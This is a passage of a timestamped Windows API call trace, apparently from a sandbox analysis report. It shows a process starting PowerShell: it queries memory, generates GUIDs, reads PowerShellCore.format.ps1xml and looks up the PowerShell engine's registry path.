	[0397.414] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.414] VirtualQuery (in: lpAddress=0x16bac0, lpBuffer=0x16c980, dwLength=0x30 | out: lpBuffer=0x16c980*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.414] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.414] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.414] VirtualQuery (in: lpAddress=0x16bdf0, lpBuffer=0x16ccb0, dwLength=0x30 | out: lpBuffer=0x16ccb0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.414] VirtualQuery (in: lpAddress=0x16be80, lpBuffer=0x16cd40, dwLength=0x30 | out: lpBuffer=0x16cd40*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.414] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x64b0c100, Data2=0x4a62, Data3=0x4c58, Data4=([0]=0x98, [1]=0xe0, [2]=0x11, [3]=0x75, [4]=0xe9, [5]=0xee, [6]=0xb4, [7]=0x71))) returned 0x0
	[0397.414] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x2440ce0a, Data2=0x9b2f, Data3=0x4a17, Data4=([0]=0x89, [1]=0xaa, [2]=0x23, [3]=0x48, [4]=0x13, [5]=0x97, [6]=0xe3, [7]=0x8b))) returned 0x0
	[0397.415] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x363bb098, Data2=0x2ee9, Data3=0x46e7, Data4=([0]=0x9c, [1]=0x93, [2]=0x56, [3]=0x98, [4]=0xec, [5]=0xc7, [6]=0x12, [7]=0xb3))) returned 0x0
	[0397.415] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5b9a5097, Data2=0x7e3f, Data3=0x4740, Data4=([0]=0xa3, [1]=0x7c, [2]=0xae, [3]=0x84, [4]=0x21, [5]=0x64, [6]=0x26, [7]=0x93))) returned 0x0
	[0397.415] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x773c22d5, Data2=0xc12b, Data3=0x4255, Data4=([0]=0x8f, [1]=0xe9, [2]=0x48, [3]=0x24, [4]=0x1e, [5]=0x24, [6]=0x54, [7]=0x5f))) returned 0x0
	[0397.415] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.415] VirtualQuery (in: lpAddress=0x16bc60, lpBuffer=0x16cb20, dwLength=0x30 | out: lpBuffer=0x16cb20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.415] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x4e5997ce, Data2=0x9174, Data3=0x48de, Data4=([0]=0xa9, [1]=0xaf, [2]=0xc7, [3]=0xb0, [4]=0x6d, [5]=0x5a, [6]=0x23, [7]=0x52))) returned 0x0
	[0397.415] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x4ac56685, Data2=0x723d, Data3=0x40af, Data4=([0]=0x92, [1]=0x78, [2]=0x8c, [3]=0x15, [4]=0x5c, [5]=0x8e, [6]=0x88, [7]=0x91))) returned 0x0
	[0397.416] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x85719acc, Data2=0x872d, Data3=0x42f2, Data4=([0]=0xb1, [1]=0xf9, [2]=0xac, [3]=0x38, [4]=0x4c, [5]=0x64, [6]=0x8f, [7]=0x4e))) returned 0x0
	[0397.416] SetErrorMode (uMode=0x1) returned 0x1
	[0397.416] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0397.416] SetErrorMode (uMode=0x1) returned 0x1
	[0397.416] GetFileType (hFile=0x2f8) returned 0x1
	[0397.416] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.417] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.417] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.417] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.417] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.418] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.419] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.419] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.419] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.419] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.419] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x1000, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0xe67, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3011d3f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3011d3f*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0397.420] ReadFile (in: hFile=0x2f8, lpBuffer=0x3012770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d3b8, lpOverlapped=0x0 | out: lpBuffer=0x3012770*, lpNumberOfBytesRead=0x16d3b8*=0x0, lpOverlapped=0x0) returned 1
	[0397.420] SetErrorMode (uMode=0x1) returned 0x1
	[0397.421] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d360 | out: lpFileInformation=0x16d360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0397.421] SetErrorMode (uMode=0x1) returned 0x1
	[0397.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d448 | out: phkResult=0x16d448*=0x2f8) returned 0x0
	[0397.421] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d3cc, lpData=0x0, lpcbData=0x16d3c8*=0x0 | out: lpType=0x16d3cc*=0x1, lpData=0x0, lpcbData=0x16d3c8*=0x56) returned 0x0
	[0397.421] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c40b0
	[0397.421] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d39c, lpData=0x1b7c40b0, lpcbData=0x16d398*=0x56 | out: lpType=0x16d39c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d398*=0x56) returned 0x0
	[0397.421] CoTaskMemFree (pv=0x1b7c40b0) 
	[0397.421] RegCloseKey (hKey=0x2f8) returned 0x0
	[0397.422] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x62c362a, Data2=0xbb9f, Data3=0x438f, Data4=([0]=0x99, [1]=0xc, [2]=0xd0, [3]=0xc6, [4]=0x6a, [5]=0x7e, [6]=0x2d, [7]=0x52))) returned 0x0
	[0397.422] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x2bcc8064, Data2=0xa7b0, Data3=0x43fe, Data4=([0]=0xa2, [1]=0xdb, [2]=0x58, [3]=0xf7, [4]=0x99, [5]=0xcb, [6]=0xf0, [7]=0xfe))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xbb95cdb8, Data2=0xa43b, Data3=0x4318, Data4=([0]=0x81, [1]=0xc7, [2]=0x83, [3]=0x39, [4]=0xc7, [5]=0x5, [6]=0x64, [7]=0x34))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x22363fda, Data2=0xd529, Data3=0x4357, Data4=([0]=0xa9, [1]=0x6, [2]=0x6f, [3]=0xe0, [4]=0xc7, [5]=0xe9, [6]=0xe9, [7]=0xc9))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xfd42cd3d, Data2=0x59a4, Data3=0x4aae, Data4=([0]=0xb2, [1]=0x25, [2]=0xcf, [3]=0x25, [4]=0xf0, [5]=0xe8, [6]=0x56, [7]=0x7d))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5bf0e1fd, Data2=0x661b, Data3=0x4add, Data4=([0]=0xaf, [1]=0x46, [2]=0x30, [3]=0x39, [4]=0xba, [5]=0x5e, [6]=0xfe, [7]=0x93))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x4ece2889, Data2=0x88ac, Data3=0x4805, Data4=([0]=0x94, [1]=0xb5, [2]=0xc1, [3]=0x5d, [4]=0x12, [5]=0x26, [6]=0xbf, [7]=0x96))) returned 0x0
	[0397.423] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa474e791, Data2=0x34d7, Data3=0x4c55, Data4=([0]=0xa9, [1]=0x2c, [2]=0x3c, [3]=0x50, [4]=0x76, [5]=0xdb, [6]=0x65, [7]=0x34))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x48c7d16, Data2=0xb3c8, Data3=0x409c, Data4=([0]=0xa4, [1]=0x39, [2]=0x87, [3]=0xdc, [4]=0x55, [5]=0x19, [6]=0x35, [7]=0x40))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x46f01e87, Data2=0x546, Data3=0x4328, Data4=([0]=0x85, [1]=0xfc, [2]=0x60, [3]=0x62, [4]=0xc4, [5]=0xa4, [6]=0x72, [7]=0xeb))) returned 0x0
	[0397.423] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x53a24892, Data2=0x892, Data3=0x4469, Data4=([0]=0xa3, [1]=0xf1, [2]=0xae, [3]=0x3f, [4]=0x19, [5]=0xfe, [6]=0x12, [7]=0xa6))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x2c5ff82e, Data2=0xebc4, Data3=0x4780, Data4=([0]=0x9b, [1]=0x99, [2]=0xae, [3]=0x4c, [4]=0xe, [5]=0x7a, [6]=0xc6, [7]=0x88))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x548b3362, Data2=0x9390, Data3=0x4b35, Data4=([0]=0x96, [1]=0xf9, [2]=0x56, [3]=0x55, [4]=0x31, [5]=0x65, [6]=0x3e, [7]=0xd1))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x613a6126, Data2=0xbce, Data3=0x459f, Data4=([0]=0x88, [1]=0x32, [2]=0xf6, [3]=0xe3, [4]=0xed, [5]=0x61, [6]=0x23, [7]=0xef))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x71cecf05, Data2=0x8c53, Data3=0x4170, Data4=([0]=0x96, [1]=0x21, [2]=0xde, [3]=0x4c, [4]=0x33, [5]=0xb7, [6]=0xd7, [7]=0x72))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5cabee45, Data2=0xbdb8, Data3=0x4378, Data4=([0]=0x93, [1]=0x89, [2]=0x6, [3]=0xd4, [4]=0x2, [5]=0xc5, [6]=0x4e, [7]=0x99))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xbe806600, Data2=0xb00f, Data3=0x4db4, Data4=([0]=0xba, [1]=0xd, [2]=0xd6, [3]=0x72, [4]=0xba, [5]=0xcc, [6]=0xd0, [7]=0xd9))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x3d9af3ab, Data2=0x7f70, Data3=0x4b76, Data4=([0]=0xaf, [1]=0x8, [2]=0x34, [3]=0x46, [4]=0x21, [5]=0x61, [6]=0x39, [7]=0x37))) returned 0x0
	[0397.424] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa20bd115, Data2=0x77e3, Data3=0x4c37, Data4=([0]=0x86, [1]=0xe1, [2]=0x2, [3]=0x6c, [4]=0xb6, [5]=0x20, [6]=0x87, [7]=0x7b))) returned 0x0
	[0397.424] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.425] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.425] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xdaa7aac1, Data2=0x538e, Data3=0x42e0, Data4=([0]=0x95, [1]=0xa5, [2]=0x8e, [3]=0xd2, [4]=0x9c, [5]=0xe3, [6]=0xc3, [7]=0x45))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x7d4141e1, Data2=0x30bd, Data3=0x4bd7, Data4=([0]=0xa0, [1]=0x31, [2]=0xf5, [3]=0x9, [4]=0x2f, [5]=0xae, [6]=0x0, [7]=0x46))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa396db4, Data2=0xba1f, Data3=0x4ede, Data4=([0]=0xab, [1]=0x7d, [2]=0xb4, [3]=0xd4, [4]=0xb8, [5]=0xc9, [6]=0x2a, [7]=0x6a))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xff01e369, Data2=0x4e62, Data3=0x4af7, Data4=([0]=0x98, [1]=0x67, [2]=0x91, [3]=0x3, [4]=0x68, [5]=0x8a, [6]=0x48, [7]=0xa2))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x7a015a8a, Data2=0x72f3, Data3=0x496f, Data4=([0]=0xa3, [1]=0x7c, [2]=0xe7, [3]=0x75, [4]=0x1f, [5]=0x39, [6]=0xa4, [7]=0x35))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x70357884, Data2=0x343b, Data3=0x40f7, Data4=([0]=0xa7, [1]=0x45, [2]=0x55, [3]=0x3e, [4]=0xbd, [5]=0x56, [6]=0xab, [7]=0x8a))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x3b1a86f2, Data2=0x3202, Data3=0x4013, Data4=([0]=0x90, [1]=0xdb, [2]=0x25, [3]=0x40, [4]=0x18, [5]=0x8a, [6]=0x6f, [7]=0x4f))) returned 0x0
	[0397.425] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xd4aad1cc, Data2=0x4427, Data3=0x4e87, Data4=([0]=0x82, [1]=0xb8, [2]=0x1b, [3]=0x88, [4]=0xe7, [5]=0xa9, [6]=0xda, [7]=0xaa))) returned 0x0
	[0397.426] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x5785a161, Data2=0xfcba, Data3=0x4e48, Data4=([0]=0xbe, [1]=0x7d, [2]=0x2d, [3]=0x74, [4]=0x25, [5]=0x11, [6]=0xfd, [7]=0x99))) returned 0x0
	[0397.426] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x21fe700e, Data2=0x3ee5, Data3=0x460d, Data4=([0]=0xa1, [1]=0x2e, [2]=0x76, [3]=0xea, [4]=0x1d, [5]=0xaf, [6]=0x3f, [7]=0x7))) returned 0x0
	[0397.426] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xc9c764b6, Data2=0x66c4, Data3=0x4487, Data4=([0]=0x8e, [1]=0x5e, [2]=0x5f, [3]=0x96, [4]=0xec, [5]=0x58, [6]=0xc2, [7]=0x28))) returned 0x0
	[0397.426] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xd5dee84d, Data2=0x744, Data3=0x4c61, Data4=([0]=0x85, [1]=0x17, [2]=0x8b, [3]=0x11, [4]=0xb7, [5]=0x4b, [6]=0xb8, [7]=0xf4))) returned 0x0
	[0397.426] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x6745c3c1, Data2=0x3565, Data3=0x4ebe, Data4=([0]=0xb4, [1]=0x28, [2]=0x1d, [3]=0x4d, [4]=0xa3, [5]=0xb, [6]=0x2c, [7]=0x34))) returned 0x0
	[0397.426] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.426] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x961bf986, Data2=0xa194, Data3=0x4a27, Data4=([0]=0x89, [1]=0xa8, [2]=0x7e, [3]=0xc3, [4]=0xfd, [5]=0x58, [6]=0x3e, [7]=0x7d))) returned 0x0
	[0397.426] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.427] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x47281a7d, Data2=0x8cd1, Data3=0x4c16, Data4=([0]=0xa1, [1]=0x6f, [2]=0x5c, [3]=0x9, [4]=0xbc, [5]=0x2e, [6]=0xf0, [7]=0x8d))) returned 0x0
	[0397.428] VirtualQuery (in: lpAddress=0x16c020, lpBuffer=0x16cee0, dwLength=0x30 | out: lpBuffer=0x16cee0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xe0f449a4, Data2=0x4039, Data3=0x42a2, Data4=([0]=0x9c, [1]=0xd4, [2]=0x60, [3]=0xd5, [4]=0xdc, [5]=0x96, [6]=0xc5, [7]=0xc4))) returned 0x0
	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x555cf9fa, Data2=0x10e3, Data3=0x4dfc, Data4=([0]=0x9e, [1]=0x65, [2]=0x8b, [3]=0xac, [4]=0xdc, [5]=0xe7, [6]=0x7d, [7]=0x77))) returned 0x0
	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0x539d7c8a, Data2=0x2bbc, Data3=0x4c9d, Data4=([0]=0x9d, [1]=0xe1, [2]=0x69, [3]=0xab, [4]=0x92, [5]=0xe0, [6]=0x92, [7]=0x45))) returned 0x0
	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xa9ccad21, Data2=0xd2cc, Data3=0x4d8e, Data4=([0]=0xaa, [1]=0x4f, [2]=0x6, [3]=0xbc, [4]=0xd9, [5]=0x3b, [6]=0xf6, [7]=0xd1))) returned 0x0
	[0397.428] CoCreateGuid (in: pguid=0x16d670 | out: pguid=0x16d670*(Data1=0xbc7e8fde, Data2=0xee11, Data3=0x4122, Data4=([0]=0x87, [1]=0xef, [2]=0x8, [3]=0x3b, [4]=0x76, [5]=0x4d, [6]=0xdc, [7]=0xe7))) returned 0x0
